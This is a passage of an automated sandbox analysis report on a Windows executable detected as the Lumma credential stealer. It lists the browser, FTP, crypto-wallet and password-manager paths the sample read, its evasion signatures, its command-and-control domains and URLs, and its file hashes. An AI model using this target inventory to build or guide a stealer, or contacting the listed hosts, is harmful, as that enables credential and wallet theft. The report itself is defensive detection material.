      Source: C:\Users\user\Desktop\Sender.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeFile opened: C:\Users\user\AppData\Roaming\ArmoryJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeFile opened: C:\Users\user\AppData\Roaming\DashCore\walletsJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeFile opened: C:\Users\user\AppData\Roaming\WalletWasabi\Client\WalletsJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeFile opened: C:\Users\user\AppData\Roaming\Daedalus Mainnet\walletsJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeFile opened: C:\Users\user\AppData\Roaming\BitwardenJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeFile opened: C:\Users\user\AppData\Roaming\NordPassJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeFile opened: C:\Users\user\AppData\Local\1PasswordJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeDirectory queried: C:\Users\user\Documents\EIVQSAOTAQJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeDirectory queried: C:\Users\user\Documents\EIVQSAOTAQJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeDirectory queried: C:\Users\user\Documents\JDDHMPCDUJJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeDirectory queried: C:\Users\user\Documents\LIJDSFKJZGJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeDirectory queried: C:\Users\user\Documents\QCOILOQIKCJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeDirectory queried: C:\Users\user\Documents\QCOILOQIKCJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeDirectory queried: C:\Users\user\Documents\UNKRLCVOHVJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeDirectory queried: C:\Users\user\Documents\ZGGKNSUKOPJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeDirectory queried: C:\Users\user\Documents\EIVQSAOTAQJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeDirectory queried: C:\Users\user\Documents\JDDHMPCDUJJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeDirectory queried: C:\Users\user\Documents\LIJDSFKJZGJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeDirectory queried: C:\Users\user\Documents\QCOILOQIKCJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeDirectory queried: C:\Users\user\Documents\ZGGKNSUKOPJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeDirectory queried: C:\Users\user\Documents\ZGGKNSUKOPJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeDirectory queried: C:\Users\user\Documents\EIVQSAOTAQJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeDirectory queried: C:\Users\user\Documents\LIJDSFKJZGJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeDirectory queried: C:\Users\user\Documents\UNKRLCVOHVJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeDirectory queried: C:\Users\user\Documents\ZGGKNSUKOPJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeDirectory queried: C:\Users\user\Documents\EIVQSAOTAQJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeDirectory queried: C:\Users\user\Documents\JDDHMPCDUJJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeDirectory queried: C:\Users\user\Documents\LIJDSFKJZGJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeDirectory queried: C:\Users\user\Documents\QCOILOQIKCJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeDirectory queried: C:\Users\user\Documents\UNKRLCVOHVJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeDirectory queried: C:\Users\user\Documents\ZGGKNSUKOPJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeDirectory queried: C:\Users\user\Documents\LIJDSFKJZGJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeDirectory queried: C:\Users\user\Documents\QCOILOQIKCJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeDirectory queried: C:\Users\user\Documents\UNKRLCVOHVJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeDirectory queried: C:\Users\user\Documents\ZGGKNSUKOPJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeDirectory queried: C:\Users\user\Documents\EIVQSAOTAQJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeDirectory queried: C:\Users\user\Documents\JDDHMPCDUJJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeDirectory queried: C:\Users\user\Documents\ZGGKNSUKOPJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeDirectory queried: C:\Users\user\Documents\LIJDSFKJZGJump to behavior
      Source: C:\Users\user\Desktop\Sender.exeDirectory queried: C:\Users\user\DocumentsJump to behavior

      Remote Access Functionality

      barindex
      Source: Yara matchFile source: 0.2.Sender.exe.a00000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 00000000.00000002.1292268043.0000000000A01000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY

      Mitre Att&ck Matrix

      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid Accounts12
      Windows Management Instrumentation      		1
      DLL Side-Loading      		1
      DLL Side-Loading      		21
      Virtualization/Sandbox Evasion      		3
      OS Credential Dumping      		221
      Security Software Discovery      		Remote Services1
      Archive Collected Data      		11
      Encrypted Channel      		Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts11
      Obfuscated Files or Information      		LSASS Memory21
      Virtualization/Sandbox Evasion      		Remote Desktop Protocol41
      Data from Local System      		2
      Non-Application Layer Protocol      		Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
      Software Packing      		Security Account Manager1
      Process Discovery      		SMB/Windows Admin SharesData from Network Shared Drive113
      Application Layer Protocol      		Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
      DLL Side-Loading      		NTDS1
      File and Directory Discovery      		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets22
      System Information Discovery      		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1675540 Sample: Sender.exe Startdate: 27/04/2025 Architecture: WINDOWS Score: 100 10 tropiscbs.live 2->10 14 Suricata IDS alerts for network traffic 2->14 16 Found malware configuration 2->16 18 Antivirus detection for URL or domain 2->18 20 5 other signatures 2->20 6 Sender.exe 2->6         started        signatures3 process4 dnsIp5 12 tropiscbs.live 104.21.77.203, 443, 49710, 49711 CLOUDFLARENETUS United States 6->12 22 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 6->22 24 Query firmware table information (likely to detect VMs) 6->24 26 Tries to harvest and steal ftp login credentials 6->26 28 3 other signatures 6->28 signatures6

      Screenshots

      Download Video

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      Sender.exe71%VirustotalBrowse
      Sender.exe67%ReversingLabsWin32.Spyware.Lummastealer
      Sender.exe100%AviraTR/Crypt.XPACK.Gen

      Dropped Files

      No Antivirus matches

      Unpacked PE Files

      No Antivirus matches

      Domains

      No Antivirus matches

      URLs

      SourceDetectionScannerLabelLink
      https://tropiscbs.live:443/iuwxxD100%Avira URL Cloudmalware
      https://tropiscbs.live/100%Avira URL Cloudmalware
      https://tropiscbs.live/PgY100%Avira URL Cloudmalware
      https://tropiscbs.live/iuwxx100%Avira URL Cloudmalware
      https://tropiscbs.live//gV100%Avira URL Cloudmalware
      https://tropiscbs.live/hg100%Avira URL Cloudmalware
      https://tropiscbs.live:443/iuwxx100%Avira URL Cloudmalware
      https://tropiscbs.live/iuwxxoY100%Avira URL Cloudmalware
      https://tropiscbs.live:443/iuwxxbcryptPrimitives.dll100%Avira URL Cloudmalware
      https://tropiscbs.live/iuwxxuu100%Avira URL Cloudmalware
      https://tropiscbs.live/=gD100%Avira URL Cloudmalware

      Domains and IPs

      Download Network PCAP: filteredfull

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      tropiscbs.live
      		104.21.77.203
      		truetrue
        		unknown

        Contacted URLs

        NameMaliciousAntivirus DetectionReputation
        climatologfy.top/kbudfalse
          		high
          https://tropiscbs.live/iuwxxtrue
          • Avira URL Cloud: malware
          		unknown
          vigorbridgoe.top/banbfalse
            		high
            cartograhphy.top/ixaufalse
              		high
              woodpeckersd.run/glskfalse
                		high
                geographys.run/eirqfalse
                  		high
                  biosphxere.digital/tqoafalse
                    		high
                    tropiscbs.live/iuwxxfalse
                      		high
                      topographky.top/xlakfalse
                        		high
                        NameSourceMaliciousAntivirus DetectionReputation
                        https://tropiscbs.live:443/iuwxxDSender.exe, 00000000.00000002.1291751130.000000000064E000.00000004.00000020.00020000.00000000.sdmp, Sender.exe, 00000000.00000003.1290555834.000000000064E000.00000004.00000020.00020000.00000000.sdmp, Sender.exe, 00000000.00000003.1244133244.000000000064E000.00000004.00000020.00020000.00000000.sdmp, Sender.exe, 00000000.00000003.1278704674.000000000064E000.00000004.00000020.00020000.00000000.sdmp, Sender.exe, 00000000.00000003.1172718970.000000000064E000.00000004.00000020.00020000.00000000.sdmp, Sender.exe, 00000000.00000003.1232012397.000000000064E000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: malware
                        		unknown
                        https://duckduckgo.com/ac/?q=Sender.exe, 00000000.00000003.1178836756.0000000002F78000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          https://tropiscbs.live/PgYSender.exe, 00000000.00000003.1251834541.00000000006CB000.00000004.00000020.00020000.00000000.sdmp, Sender.exe, 00000000.00000003.1290417095.00000000006DD000.00000004.00000020.00020000.00000000.sdmp, Sender.exe, 00000000.00000002.1291970435.00000000006DD000.00000004.00000020.00020000.00000000.sdmp, Sender.exe, 00000000.00000003.1278664144.00000000006D8000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: malware
                          		unknown
                          https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpgSender.exe, 00000000.00000003.1208872584.0000000000707000.00000004.00000020.00020000.00000000.sdmpfalse
                            		high
                            https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.Sender.exe, 00000000.00000003.1208872584.0000000000707000.00000004.00000020.00020000.00000000.sdmpfalse
                              		high
                              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=Sender.exe, 00000000.00000003.1178836756.0000000002F78000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                https://tropiscbs.live/hgSender.exe, 00000000.00000003.1290417095.00000000006DD000.00000004.00000020.00020000.00000000.sdmp, Sender.exe, 00000000.00000002.1291970435.00000000006DD000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: malware
                                		unknown
                                http://crl.rootca1.amazontrust.com/rootca1.crl0Sender.exe, 00000000.00000003.1207327540.0000000002FFE000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://ac.ecosia.org?q=Sender.exe, 00000000.00000003.1178836756.0000000002F78000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&ctaSender.exe, 00000000.00000003.1208872584.0000000000707000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=Sender.exe, 00000000.00000003.1178836756.0000000002F78000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://ocsp.rootca1.amazontrust.com0:Sender.exe, 00000000.00000003.1207327540.0000000002FFE000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://tropiscbs.live/Sender.exe, Sender.exe, 00000000.00000003.1251834541.00000000006CB000.00000004.00000020.00020000.00000000.sdmp, Sender.exe, 00000000.00000003.1244298918.00000000006DC000.00000004.00000020.00020000.00000000.sdmp, Sender.exe, 00000000.00000003.1172718970.0000000000657000.00000004.00000020.00020000.00000000.sdmp, Sender.exe, 00000000.00000003.1290417095.00000000006DD000.00000004.00000020.00020000.00000000.sdmp, Sender.exe, 00000000.00000002.1291970435.00000000006DD000.00000004.00000020.00020000.00000000.sdmp, Sender.exe, 00000000.00000003.1278664144.00000000006D8000.00000004.00000020.00020000.00000000.sdmp, Sender.exe, 00000000.00000003.1232012397.0000000000657000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: malware
                                          		unknown
                                          https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brSender.exe, 00000000.00000003.1208526403.0000000003181000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://www.google.com/images/branding/product/ico/googleg_alldp.icoSender.exe, 00000000.00000003.1178836756.0000000002F78000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://tropiscbs.live:443/iuwxxbcryptPrimitives.dllSender.exe, 00000000.00000002.1291751130.000000000064E000.00000004.00000020.00020000.00000000.sdmp, Sender.exe, 00000000.00000003.1290555834.000000000064E000.00000004.00000020.00020000.00000000.sdmp, Sender.exe, 00000000.00000003.1244133244.000000000064E000.00000004.00000020.00020000.00000000.sdmp, Sender.exe, 00000000.00000003.1278704674.000000000064E000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: malware
                                              		unknown
                                              https://www.ecosia.org/newtab/v20Sender.exe, 00000000.00000003.1178836756.0000000002F78000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                https://tropiscbs.live:443/iuwxxSender.exe, 00000000.00000002.1291751130.000000000064E000.00000004.00000020.00020000.00000000.sdmp, Sender.exe, 00000000.00000003.1290555834.000000000064E000.00000004.00000020.00020000.00000000.sdmp, Sender.exe, 00000000.00000003.1244133244.000000000064E000.00000004.00000020.00020000.00000000.sdmp, Sender.exe, 00000000.00000003.1278704674.000000000064E000.00000004.00000020.00020000.00000000.sdmp, Sender.exe, 00000000.00000003.1232012397.000000000064E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: malware
                                                		unknown
                                                https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpgSender.exe, 00000000.00000003.1208872584.0000000000707000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYiSender.exe, 00000000.00000003.1208872584.0000000000707000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://x1.c.lencr.org/0Sender.exe, 00000000.00000003.1207327540.0000000002FFE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://x1.i.lencr.org/0Sender.exe, 00000000.00000003.1207327540.0000000002FFE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://duckduckgo.com/chrome_newtabv20Sender.exe, 00000000.00000003.1178836756.0000000002F78000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://tropiscbs.live/iuwxxoYSender.exe, 00000000.00000003.1192811300.00000000006FD000.00000004.00000020.00020000.00000000.sdmp, Sender.exe, 00000000.00000003.1192689490.00000000006F8000.00000004.00000020.00020000.00000000.sdmp, Sender.exe, 00000000.00000003.1192773770.00000000006F8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: malware
                                                          		unknown
                                                          https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchSender.exe, 00000000.00000003.1178836756.0000000002F78000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://crt.rootca1.amazontrust.com/rootca1.cer0?Sender.exe, 00000000.00000003.1207327540.0000000002FFE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://tropiscbs.live/iuwxxuuSender.exe, 00000000.00000003.1251834541.00000000006CB000.00000004.00000020.00020000.00000000.sdmp, Sender.exe, 00000000.00000003.1290417095.00000000006DD000.00000004.00000020.00020000.00000000.sdmp, Sender.exe, 00000000.00000002.1291970435.00000000006DD000.00000004.00000020.00020000.00000000.sdmp, Sender.exe, 00000000.00000003.1278664144.00000000006D8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: malware
                                                              		unknown
                                                              https://support.mozilla.org/products/firefoxgro.allSender.exe, 00000000.00000003.1208526403.0000000003181000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://tropiscbs.live//gVSender.exe, 00000000.00000003.1290417095.00000000006DD000.00000004.00000020.00020000.00000000.sdmp, Sender.exe, 00000000.00000002.1291970435.00000000006DD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: malware
                                                                		unknown
                                                                https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=Sender.exe, 00000000.00000003.1178836756.0000000002F78000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://gemini.google.com/app?q=Sender.exe, 00000000.00000003.1178836756.0000000002F78000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://tropiscbs.live/=gDSender.exe, 00000000.00000003.1251834541.00000000006CB000.00000004.00000020.00020000.00000000.sdmp, Sender.exe, 00000000.00000003.1278664144.00000000006D8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: malware
                                                                    		unknown
                                                                    https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94Sender.exe, 00000000.00000003.1208872584.0000000000707000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		high

                                                                      World Map of Contacted IPs

                                                                      • No. of IPs < 25%
                                                                      • 25% < No. of IPs < 50%
                                                                      • 50% < No. of IPs < 75%
                                                                      • 75% < No. of IPs

                                                                      Public IPs

                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                      104.21.77.203
                                                                      		tropiscbs.liveUnited States
                                                                      		13335CLOUDFLARENETUStrue

                                                                      General Information

                                                                      Joe Sandbox version:42.0.0 Malachite
                                                                      Analysis ID:1675540
                                                                      Start date and time:2025-04-27 18:35:36 +02:00
                                                                      Joe Sandbox product:CloudBasic
                                                                      Overall analysis duration:0h 4m 53s
                                                                      Hypervisor based Inspection enabled:false
                                                                      Report type:full
                                                                      Cookbook file name:default.jbs
                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                      Number of analysed new started processes analysed:10
                                                                      Number of new started drivers analysed:0
                                                                      Number of existing processes analysed:0
                                                                      Number of existing drivers analysed:0
                                                                      Number of injected processes analysed:0
                                                                      Technologies:
                                                                      • HCA enabled
                                                                      • EGA enabled
                                                                      • AMSI enabled
                                                                      Analysis Mode:default
                                                                      Analysis stop reason:Timeout
                                                                      Sample name:Sender.exe
                                                                      Detection:MAL
                                                                      Classification:mal100.troj.spyw.evad.winEXE@1/0@1/1
                                                                      EGA Information:Failed
                                                                      HCA Information:
                                                                      • Successful, ratio: 100%
                                                                      • Number of executed functions: 0
                                                                      • Number of non-executed functions: 6
                                                                      Cookbook Comments:
                                                                      • Found application associated with file extension: .exe
                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                      • Excluded IPs from analysis (whitelisted): 184.85.78.223, 4.175.87.197
                                                                      • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, c.pki.goog, fe3cr.delivery.mp.microsoft.com
                                                                      • Execution Graph export aborted for target Sender.exe, PID 4768 because there are no executed function
                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                      Simulations

                                                                      Behavior and APIs

                                                                      TimeTypeDescription
                                                                      12:36:32API Interceptor6x Sleep call for process: Sender.exe modified

                                                                      Joe Sandbox View / Context

                                                                      IPs

                                                                      No context

                                                                      Domains

                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      tropiscbs.liverandom.exeGet hashmaliciousAmadey, Credential Flusher, Healer AV Disabler, LummaC StealerBrowse
                                                                      • 172.67.211.127

                                                                      ASNs

                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      CLOUDFLARENETUSXClient3.exeGet hashmaliciousXWormBrowse
                                                                      • 104.22.68.199
                                                                      250427-s7lnpawnw3.bin.exeGet hashmaliciousSilverRatBrowse
                                                                      • 162.159.135.232
                                                                      250427-s7lnpawnw3.bin.exeGet hashmaliciousSilverRatBrowse
                                                                      • 162.159.138.232
                                                                      250427-ryd2tassex.bin.exeGet hashmaliciousAmadey, Credential Flusher, Healer AV Disabler, LummaC StealerBrowse
                                                                      • 104.21.85.126
                                                                      250427-rzwcgsvn14.bin.exeGet hashmaliciousLummaC StealerBrowse
                                                                      • 172.67.155.125
                                                                      250427-p7bxps1sgx.bin.exeGet hashmaliciousAmadey, Credential Flusher, Healer AV Disabler, LummaC StealerBrowse
                                                                      • 104.21.85.126
                                                                      250427-p5qcba1sdw.bin.exeGet hashmaliciousAmadey, Credential Flusher, Healer AV Disabler, JasonRAT, LummaC StealerBrowse
                                                                      • 172.67.205.184
                                                                      random.exeGet hashmaliciousAmadey, Credential Flusher, GhostRat, Healer AV Disabler, LummaC StealerBrowse
                                                                      • 172.67.205.184
                                                                      random.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                      • 162.159.200.1
                                                                      random.exeGet hashmaliciousAmadey, LummaC StealerBrowse
                                                                      • 104.21.85.126

                                                                      JA3 Fingerprints

                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      a0e9f5d64349fb13191bc781f81f42e1curriculum_vitae_actualise.vbsGet hashmaliciousXmrigBrowse
                                                                      • 104.21.77.203
                                                                      250427-tnf5jawr13.bin.exeGet hashmaliciousFloodFix, GhostRatBrowse
                                                                      • 104.21.77.203
                                                                      Gdrive_files__________.zip_019207.pdfGet hashmaliciousUnknownBrowse
                                                                      • 104.21.77.203
                                                                      250427-s9wxfatshz.bin.exeGet hashmaliciousUnknownBrowse
                                                                      • 104.21.77.203
                                                                      250427-s9wxfatshz.bin.exeGet hashmaliciousUnknownBrowse
                                                                      • 104.21.77.203
                                                                      250427-rzwcgsvn14.bin.exeGet hashmaliciousLummaC StealerBrowse
                                                                      • 104.21.77.203
                                                                      250427-p7bxps1sgx.bin.exeGet hashmaliciousAmadey, Credential Flusher, Healer AV Disabler, LummaC StealerBrowse
                                                                      • 104.21.77.203
                                                                      random.exeGet hashmaliciousAmadey, Credential Flusher, GhostRat, Healer AV Disabler, LummaC StealerBrowse
                                                                      • 104.21.77.203
                                                                      random.exeGet hashmaliciousAmadey, LummaC StealerBrowse
                                                                      • 104.21.77.203
                                                                      random.exeGet hashmaliciousAmadey, LummaC StealerBrowse
                                                                      • 104.21.77.203

                                                                      Dropped Files

                                                                      No context

                                                                      Created / dropped Files

                                                                      No created / dropped files found

                                                                      Static File Info

                                                                      General

                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                                                      Entropy (8bit):7.9288011201939135
                                                                      TrID:
                                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                      File name:Sender.exe
                                                                      File size:169'472 bytes
                                                                      MD5:39e94524e19c217d1f19208a42a12947
                                                                      SHA1:32ecfdad659adfc975c9bf3ac8f9c07d807392ac
